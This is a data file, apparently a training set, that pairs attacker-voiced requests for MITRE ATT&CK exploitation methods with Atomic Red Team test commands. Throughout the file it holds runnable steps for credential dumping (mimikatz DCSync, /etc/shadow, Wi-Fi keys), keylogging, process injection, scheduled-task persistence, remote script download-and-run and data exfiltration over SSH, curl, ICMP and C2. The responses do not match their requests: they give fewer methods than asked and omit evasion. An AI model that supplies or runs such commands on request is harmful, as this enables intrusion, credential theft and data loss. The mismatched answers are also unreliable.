instruction
stringlengths
87
229
response
stringlengths
192
60.5k
source
stringclasses
4 values
technique
stringlengths
5
109
MITRE T1003.006: OS Credential Dumping: DCSync — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1003.006: OS Credential Dumping: DCSync ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: DCSync (Active Directory) **Executor**: command_prompt **Command**: ``` #{mimikatz_path} "lsadump::dcsync /domain:#{domain} /user:#{user}@#{domain}" "exit" ``` ### Test 2: Run ...
ART
T1003.006
Attacker perspective on MITRE T1003.007: OS Credential Dumping: Proc Filesystem: Give 4+ methods with step-by-step instructions and code samples.
# MITRE T1003.007: OS Credential Dumping: Proc Filesystem ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Dump individual process memory with sh (Local) **Executor**: sh **Command**: ``` sh #{script_path} PID=$(pgrep -n -f "#{pid_term}") HEAP_MEM=$(grep -E "^[0-9a-f-]* r" /...
ART
T1003.007
Red team: MITRE T1003.008: OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow. List 5 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1003.008: OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Access /etc/shadow (Local) **Executor**: bash **Command**: ``` sudo cat /etc/shadow > #{output_file} cat #{output_file} ``` **Cleanup**:...
ART
T1003.008
TARGET: MITRE T1005: Data from Local System. Provide 3 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
# MITRE T1005: Data from Local System ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Search files of interest and save them to a single zip file (Windows) **Executor**: powershell **Command**: ``` $startingDirectory = "#{starting_directory}" $outputZip = "#{output_zip_fold...
ART
T1005
Red team: MITRE T1006: Direct Volume Access. List 3 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1006: Direct Volume Access ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Read volume boot sector via DOS device path (PowerShell) **Executor**: powershell **Command**: ``` $buffer = New-Object byte[] 11 $handle = New-Object IO.FileStream "\\.\#{volume}", 'Open', ...
ART
T1006
MITRE T1007: System Service Discovery — Give 8 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1007: System Service Discovery ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: System Service Discovery **Executor**: command_prompt **Command**: ``` tasklist.exe /svc sc query sc query state= all ``` ### Test 2: System Service Discovery - net.exe **Executor**: co...
ART
T1007
MITRE T1010: Application Window Discovery — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1010: Application Window Discovery ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: List Process Main Windows - C# .NET **Executor**: command_prompt **Command**: ``` C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} "#{input_source_code}...
ART
T1010
MITRE T1012: Query Registry exploitation: provide 6+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1012: Query Registry ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Query Registry **Executor**: command_prompt **Command**: ``` reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServi...
ART
T1012
MITRE T1014: Rootkit exploitation: provide 4+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1014: Rootkit ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Loadable Kernel Module based Rootkit **Executor**: sh **Command**: ``` sudo insmod #{rootkit_path}/#{rootkit_name}.ko ``` **Cleanup**: ``` sudo rmmod #{rootkit_name} sudo rm -rf #{rootkit_path} ``` ### ...
ART
T1014
MITRE T1016: System Network Configuration Discovery: What are 9 proven attack paths? Detail each with tools, commands, payloads.
# MITRE T1016: System Network Configuration Discovery ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: System Network Configuration Discovery on Windows **Executor**: command_prompt **Command**: ``` ipconfig /all netsh interface show interface arp -a nbtstat -n net config ``...
ART
T1016
MITRE T1016.001: System Network Configuration Discovery: Internet Connection Discovery exploitation: provide 5+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1016.001: System Network Configuration Discovery: Internet Connection Discovery ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Check internet connection using ping Windows **Executor**: command_prompt **Command**: ``` ping -n 4 #{ping_target} ``` ### Test 2: Chec...
ART
T1016.001
MITRE T1016.002: System Network Configuration Discovery: Wi-Fi Discovery — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1016.002: System Network Configuration Discovery: Wi-Fi Discovery ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh **Executor**: command_prompt **Command**: ``` netsh wlan show profile * key=clear ```
ART
T1016.002
Attacker perspective on MITRE T1018: Remote System Discovery: Give 22+ methods with step-by-step instructions and code samples.
# MITRE T1018: Remote System Discovery ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Remote System Discovery - net **Executor**: command_prompt **Command**: ``` net view /domain net view ``` ### Test 2: Remote System Discovery - net group Domain Computers **Executor**: c...
ART
T1018
Red team: MITRE T1020: Automated Exfiltration. List 3 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1020: Automated Exfiltration ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: IcedID Botnet HTTP PUT **Executor**: powershell **Command**: ``` $fileName = "#{file}" $url = "#{domain}" $file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test" $c...
ART
T1020
TARGET: MITRE T1021.001: Remote Services: Remote Desktop Protocol. Provide 4 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
# MITRE T1021.001: Remote Services: Remote Desktop Protocol ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: RDP to DomainController **Executor**: powershell **Command**: ``` $Server=#{logonserver} $User = Join-Path #{domain} #{username} $Password="#{password}" cmdkey /gener...
ART
T1021.001
MITRE T1021.002: Remote Services: SMB/Windows Admin Shares: What are 4 proven attack paths? Detail each with tools, commands, payloads.
# MITRE T1021.002: Remote Services: SMB/Windows Admin Shares ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Map admin share **Executor**: command_prompt **Command**: ``` cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}" ``` ### Test 2: Map ...
ART
T1021.002
Red team: MITRE T1021.003: Remote Services: Distributed Component Object Model. List 3 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1021.003: Remote Services: Distributed Component Object Model ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: PowerShell Lateral Movement using MMC20 **Executor**: powershell **Command**: ``` [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application"...
ART
T1021.003
Attacker perspective on MITRE T1021.004: Remote Services: SSH: Give 3+ methods with step-by-step instructions and code samples.
# MITRE T1021.004: Remote Services: SSH ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: ESXi - Enable SSH via PowerCLI **Executor**: powershell **Command**: ``` Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false Connect-VIS...
ART
T1021.004
MITRE T1021.005: Remote Services:VNC: What are 3 proven attack paths? Detail each with tools, commands, payloads.
# MITRE T1021.005: Remote Services:VNC ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Enable Apple Remote Desktop Agent **Executor**: sh **Command**: ``` sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -allo...
ART
T1021.005
Attacker perspective on MITRE T1021.006: Remote Services: Windows Remote Management: Give 3+ methods with step-by-step instructions and code samples.
# MITRE T1021.006: Remote Services: Windows Remote Management ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Enable Windows Remote Management **Executor**: powershell **Command**: ``` Enable-PSRemoting -Force ``` ### Test 2: Remote Code Execution with PS Credentials Using...
ART
T1021.006
Red team: MITRE T1025: Data from Removable Media. List 3 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1025: Data from Removable Media ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Identify Documents on USB and Removable Media via PowerShell **Executor**: command_prompt **Command**: ``` powershell.exe -c "Get-Volume | Where-Object {$_.DriveType -eq 'Removable'} | ...
ART
T1025
Attacker perspective on MITRE T1027: Obfuscated Files or Information: Give 9+ methods with step-by-step instructions and code samples.
# MITRE T1027: Obfuscated Files or Information ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Decode base64 Data into Script **Executor**: sh **Command**: ``` if [ "$(uname)" = 'FreeBSD' ]; then cmd="b64decode -r"; else cmd="base64 -d"; fi; cat /tmp/encoded.dat | $cmd > /t...
ART
T1027
MITRE T1027.001: Obfuscated Files or Information: Binary Padding exploitation: provide 3+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1027.001: Obfuscated Files or Information: Binary Padding ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Pad Binary to Change Hash - Linux/macOS dd **Executor**: sh **Command**: ``` dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} #adds null bytes dd if=/dev/random ...
ART
T1027.001
Red team: MITRE T1027.002: Obfuscated Files or Information: Software Packing. List 4 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1027.002: Obfuscated Files or Information: Software Packing ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Binary simply packed by UPX (linux) **Executor**: sh **Command**: ``` cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin ``` **Cleanup**: ``` rm /tmp/packed_b...
ART
T1027.002
Red team: MITRE T1027.004: Obfuscated Files or Information: Compile After Delivery. List 5 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1027.004: Obfuscated Files or Information: Compile After Delivery ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Compile After Delivery using csc.exe **Executor**: command_prompt **Command**: ``` C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{outpu...
ART
T1027.004
Attacker perspective on MITRE T1027.006: HTML Smuggling: Give 3+ methods with step-by-step instructions and code samples.
# MITRE T1027.006: HTML Smuggling ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: HTML Smuggling Remote Payload **Executor**: powershell **Command**: ``` & "PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html" ``` **Cleanup**: ``` $user = [System.Environment]::UserName;...
ART
T1027.006
Red team: MITRE T1027.007: Obfuscated Files or Information: Dynamic API Resolution. List 3 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1027.007: Obfuscated Files or Information: Dynamic API Resolution ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Dynamic API Resolution-Ninja-syscall **Executor**: powershell **Command**: ``` Start-Process "#{exe_binary}" Start-Sleep -Seconds 7 if (Test-Path "C:\U...
ART
T1027.007
MITRE T1027.013: Obfuscated Files or Information: Encrypted/Encoded File — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1027.013: Obfuscated Files or Information: Encrypted/Encoded File ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Decode Eicar File and Write to File **Executor**: powershell **Command**: ``` $encodedString = "WDVPIVAlQEFQWzRcUFpYNTQoUF4pN0NDKTd9JEVJQ0FSLVNUQU5EQVJ...
ART
T1027.013
MITRE T1030: Data Transfer Size Limits: What are 3 proven attack paths? Detail each with tools, commands, payloads.
# MITRE T1030: Data Transfer Size Limits ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Data Transfer Size Limits **Executor**: sh **Command**: ``` cd #{folder_path}; split -b 5000000 #{file_name} ls -l #{folder_path} ``` **Cleanup**: ``` if [ -f #{folder_path}/safe_to_del...
ART
T1030
TARGET: MITRE T1033: System Owner/User Discovery. Provide 7 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
# MITRE T1033: System Owner/User Discovery ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: System Owner/User Discovery **Executor**: command_prompt **Command**: ``` cmd.exe /C whoami wmic useraccount get /ALL quser /SERVER:"#{computer_name}" quser qwinsta.exe /server:#{comp...
ART
T1033
Red team: MITRE T1036: Masquerading. List 3 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1036: Masquerading ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: System File Copied to Unusual Location **Executor**: powershell **Command**: ``` copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe" start-process "$env:allusersprof...
ART
T1036
MITRE T1036.003: Masquerading: Rename System Utilities — Give 8 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1036.003: Masquerading: Rename System Utilities ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Masquerading as Windows LSASS process **Executor**: command_prompt **Command**: ``` copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe %SystemRoot%\Temp\lsas...
ART
T1036.003
Red team: MITRE T1036.004: Masquerading: Masquerade Task or Service. List 4 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1036.004: Masquerading: Masquerade Task or Service ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Creating W32Time similar named service using schtasks **Executor**: command_prompt **Command**: ``` schtasks /create /ru system /sc daily /tr "cmd /c powershell.exe -...
ART
T1036.004
MITRE T1036.005: Masquerading: Match Legitimate Name or Location — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1036.005: Masquerading: Match Legitimate Name or Location ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Execute a process from a directory masquerading as the current parent directory **Executor**: sh **Command**: ``` mkdir $HOME/... cp $(which sh) $HOME/... $HOM...
ART
T1036.005
MITRE T1036.006: Masquerading: Space after Filename exploitation: provide 3+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1036.006: Masquerading: Space after Filename ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Space After Filename **Executor**: sh **Command**: ``` mkdir -p /tmp/atomic-test-T1036.006 cd /tmp/atomic-test-T1036.006 mkdir -p 'testdirwithspaceend ' [ "$(uname)" = 'Fre...
ART
T1036.006
MITRE T1036.007: Masquerading: Double File Extension: What are 3 proven attack paths? Detail each with tools, commands, payloads.
# MITRE T1036.007: Masquerading: Double File Extension ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: File Extension Masquerading **Executor**: command_prompt **Command**: ``` copy "#{exe_path}" %temp%\T1036.007_masquerading.docx.exe /Y copy "#{exe_path}" %temp%\T1036.007_...
ART
T1036.007
TARGET: MITRE T1037.001: Boot or Logon Initialization Scripts: Logon Script (Windows). Provide 3 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
# MITRE T1037.001: Boot or Logon Initialization Scripts: Logon Script (Windows) ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Logon Scripts **Executor**: command_prompt **Command**: ``` echo "#{script_command}" > #{script_path} REG.exe ADD HKCU\Environment /v UserInitMprL...
ART
T1037.001
TARGET: MITRE T1037.004: Boot or Logon Initialization Scripts: Rc.common. Provide 3 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
# MITRE T1037.004: Boot or Logon Initialization Scripts: Rc.common ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: rc.common **Executor**: bash **Command**: ``` sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common ``` ### Test 2: rc....
ART
T1037.004
Red team: MITRE T1037.005: Boot or Logon Initialization Scripts: Startup Items. List 3 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1037.005: Boot or Logon Initialization Scripts: Startup Items ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Add file to Local Library StartupItems **Executor**: sh **Command**: ``` sudo touch /Library/StartupItems/EvilStartup.plist ``` **Cleanup**: ``` sudo rm /L...
ART
T1037.005
Attacker perspective on MITRE T1039: Data from Network Shared Drive: Give 3+ methods with step-by-step instructions and code samples.
# MITRE T1039: Data from Network Shared Drive ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Copy a sensitive File over Administrative share with copy **Executor**: command_prompt **Command**: ``` copy \\#{remote}\C$\#{share_file} %TEMP%\#{local_file} ``` **Cleanup**: ``` ...
ART
T1039
MITRE T1040: Network Sniffing — Give 16 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1040: Network Sniffing ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Packet Capture Linux using tshark or tcpdump **Executor**: bash **Command**: ``` tcpdump -c 5 -nnni #{interface} tshark -c 5 -i #{interface} ``` ### Test 2: Packet Capture FreeBSD using tshark ...
ART
T1040
Red team: MITRE T1041: Exfiltration Over C2 Channel. List 3 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1041: Exfiltration Over C2 Channel ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: C2 Data Exfiltration **Executor**: powershell **Command**: ``` if(-not (Test-Path #{filepath})){ 1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." ...
ART
T1041
Attacker perspective on MITRE T1046: Network Service Discovery: Give 12+ methods with step-by-step instructions and code samples.
# MITRE T1046: Network Service Discovery ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Port Scan **Executor**: bash **Command**: ``` for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done ``` ### Test 2: Port Scan Nmap **E...
ART
T1046
MITRE T1047: Windows Management Instrumentation: What are 10 proven attack paths? Detail each with tools, commands, payloads.
# MITRE T1047: Windows Management Instrumentation ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: WMI Reconnaissance Users **Executor**: command_prompt **Command**: ``` wmic useraccount get /ALL /format:csv ``` ### Test 2: WMI Reconnaissance Processes **Executor**: command...
ART
T1047
MITRE T1048: Exfiltration Over Alternative Protocol exploitation: provide 4+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1048: Exfiltration Over Alternative Protocol ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Exfiltration Over Alternative Protocol - SSH **Executor**: sh **Command**: ``` ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz ``` ### Test 2: Exfiltration Over ...
ART
T1048
Red team: MITRE T1048.002: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol. List 4 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1048.002: Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Exfiltrate data HTTPS using curl windows **Executor**: command_prompt **Command**: ``` #{curl_path} -k -F "file...
ART
T1048.002
MITRE T1048.003: Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol — Give 6 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1048.003: Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Exfiltration Over Alternative Protocol - ICMP **Executor**: powershell **Command**: ``` $ping = New-Object Sys...
ART
T1048.003
MITRE T1049: System Network Connections Discovery exploitation: provide 7+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1049: System Network Connections Discovery ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: System Network Connections Discovery **Executor**: command_prompt **Command**: ``` netstat -ano net use net sessions 2>nul ``` ### Test 2: System Network Connections Discove...
ART
T1049
Attacker perspective on MITRE T1053.002: Scheduled Task/Job: At: Give 3+ methods with step-by-step instructions and code samples.
# MITRE T1053.002: Scheduled Task/Job: At ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: At.exe Scheduled task **Executor**: command_prompt **Command**: ``` at 13:20 /interactive cmd ``` ### Test 2: At - Schedule a job **Executor**: sh **Command**: ``` echo "#{at_command}...
ART
T1053.002
MITRE T1053.003: Scheduled Task/Job: Cron: What are 4 proven attack paths? Detail each with tools, commands, payloads.
# MITRE T1053.003: Scheduled Task/Job: Cron ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Cron - Replace crontab with referenced file **Executor**: sh **Command**: ``` crontab -l > /tmp/notevil echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} ``` **Cleanup...
ART
T1053.003
Attacker perspective on MITRE T1053.005: Scheduled Task/Job: Scheduled Task: Give 12+ methods with step-by-step instructions and code samples.
# MITRE T1053.005: Scheduled Task/Job: Scheduled Task ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Scheduled Task Startup Script **Executor**: command_prompt **Command**: ``` schtasks /create /tn "T1053_005_OnLogon" /sc onlogon /tr "cmd.exe /c calc.exe" schtasks /create ...
ART
T1053.005
MITRE T1053.006: Scheduled Task/Job: Systemd Timers — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1053.006: Scheduled Task/Job: Systemd Timers ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Create Systemd Service and Timer **Executor**: bash **Command**: ``` echo "[Unit]" > #{path_to_systemd_service} echo "Description=Atomic Red Team Systemd Timer Service" >> ...
ART
T1053.006
MITRE T1053.007: Kubernetes Cronjob — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1053.007: Kubernetes Cronjob ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: ListCronjobs **Executor**: bash **Command**: ``` kubectl get cronjobs -n #{namespace} ``` ### Test 2: CreateCronjob **Executor**: bash **Command**: ``` kubectl create -f src/cronjob.yaml ...
ART
T1053.007
Red team: MITRE T1055: Process Injection. List 13 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1055: Process Injection ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Shellcode execution via VBA **Executor**: powershell **Command**: ``` [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com...
ART
T1055
MITRE T1055.001: Process Injection: Dynamic-link Library Injection — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1055.001: Process Injection: Dynamic-link Library Injection ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Process Injection via mavinject.exe **Executor**: powershell **Command**: ``` $mypid = #{process_id} mavinject $mypid /INJECTRUNNING "#{dll_payload}" Stop-Pr...
ART
T1055.001
Attacker perspective on MITRE T1055.002: Process Injection: Portable Executable Injection: Give 3+ methods with step-by-step instructions and code samples.
# MITRE T1055.002: Process Injection: Portable Executable Injection ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Portable Executable Injection **Executor**: powershell **Command**: ``` Start-Process "#{exe_binary}" Start-Sleep -Seconds 7 Get-Process -Name Notepad -ErrorA...
ART
T1055.002
MITRE T1055.003: Thread Execution Hijacking: What are 3 proven attack paths? Detail each with tools, commands, payloads.
# MITRE T1055.003: Thread Execution Hijacking ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Thread Execution Hijacking **Executor**: powershell **Command**: ``` $notepad = Start-Process notepad -passthru Start-Process "$PathToAtomicsFolder\T1055.003\bin\InjectContext.exe"...
ART
T1055.003
MITRE T1055.004: Process Injection: Asynchronous Procedure Call exploitation: provide 3+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1055.004: Process Injection: Asynchronous Procedure Call ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Process Injection via C# **Executor**: command_prompt **Command**: ``` "#{exe_binary}" ``` ### Test 2: EarlyBird APC Queue Injection in Go **Executor**: powers...
ART
T1055.004
MITRE T1055.011: Process Injection: Extra Window Memory Injection — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1055.011: Process Injection: Extra Window Memory Injection ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Process Injection via Extra Window Memory (EWM) x64 executable **Executor**: powershell **Command**: ``` #{exe_binary} ``` **Cleanup**: ``` Get-Process -Name ...
ART
T1055.011
MITRE T1055.012: Process Injection: Process Hollowing exploitation: provide 4+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1055.012: Process Injection: Process Hollowing ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Process Hollowing using PowerShell **Executor**: powershell **Command**: ``` . "#{script_path}" $ppid=Get-Process #{parent_process_name} | select -expand id Start-Hollow ...
ART
T1055.012
Red team: MITRE T1055.015: Process Injection: ListPlanting. List 3 exploitation approaches with: reconnaissance, technique, PoC code.
# MITRE T1055.015: Process Injection: ListPlanting ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Process injection ListPlanting **Executor**: powershell **Command**: ``` Start-Process "#{exe_binary}" Start-Sleep -Seconds 7 Get-Process -Name Notepad -ErrorAction SilentlyCo...
ART
T1055.015
TARGET: MITRE T1056.001: Input Capture: Keylogging. Provide 8 distinct attack approaches: 1. Initial vector 2. Exploitation method 3. Payload/PoC 4. Evasion technique
# MITRE T1056.001: Input Capture: Keylogging ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Input Capture **Executor**: powershell **Command**: ``` &"$PathToAtomicsFolder\T1056.001\src\Get-Keystrokes.ps1" -LogPath #{filepath} ``` **Cleanup**: ``` Remove-Item $env:TEMP\key....
ART
T1056.001
MITRE T1056.002: Input Capture: GUI Input Capture — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1056.002: Input Capture: GUI Input Capture ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: AppleScript - Prompt User for Password **Executor**: bash **Command**: ``` osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activ...
ART
T1056.002
MITRE T1056.004: Input Capture: Credential API Hooking — Give 3 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1056.004: Input Capture: Credential API Hooking ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Hook PowerShell TLS Encrypt/Decrypt Messages **Executor**: powershell **Command**: ``` mavinject $pid /INJECTRUNNING "#{file_name}" Invoke-WebRequest #{server_name} -Use...
ART
T1056.004
Attacker perspective on MITRE T1057: Process Discovery: Give 9+ methods with step-by-step instructions and code samples.
# MITRE T1057: Process Discovery ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Process Discovery - ps **Executor**: sh **Command**: ``` ps >> #{output_file} ps aux >> #{output_file} ``` **Cleanup**: ``` rm #{output_file} ``` ### Test 2: Process Discovery - tasklist **Exe...
ART
T1057
MITRE T1059: Command and Scripting Interpreter: What are 3 proven attack paths? Detail each with tools, commands, payloads.
# MITRE T1059: Command and Scripting Interpreter ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: AutoIt Script Execution **Executor**: powershell **Command**: ``` Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}" ```
ART
T1059
MITRE T1059.001: Command and Scripting Interpreter: PowerShell — Give 21 different attacker methodologies. For each: exact commands, payloads, and evasion.
# MITRE T1059.001: Command and Scripting Interpreter: PowerShell ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Mimikatz **Executor**: command_prompt **Command**: ``` powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" ``...
ART
T1059.001
MITRE T1059.002: Command and Scripting Interpreter: AppleScript exploitation: provide 3+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1059.002: Command and Scripting Interpreter: AppleScript ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: AppleScript **Executor**: sh **Command**: ``` osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64....
ART
T1059.002
MITRE T1059.003: Command and Scripting Interpreter: Windows Command Shell exploitation: provide 6+ real-world attack chains. Each chain needs initial access, exploit, payload, post-exploit.
# MITRE T1059.003: Command and Scripting Interpreter: Windows Command Shell ## Description Security technique from MITRE ATT&CK framework. ## Atomic Tests ### Test 1: Create and Execute Batch Script **Executor**: powershell **Command**: ``` Start-Process "#{script_path}" ``` **Cleanup**: ``` Remove-Item "#{script_pa...
ART
T1059.003
Red team: MITRE T1059.005: Command and Scripting Interpreter: Visual Basic. List 3 exploitation approaches with: reconnaissance, technique, PoC code.
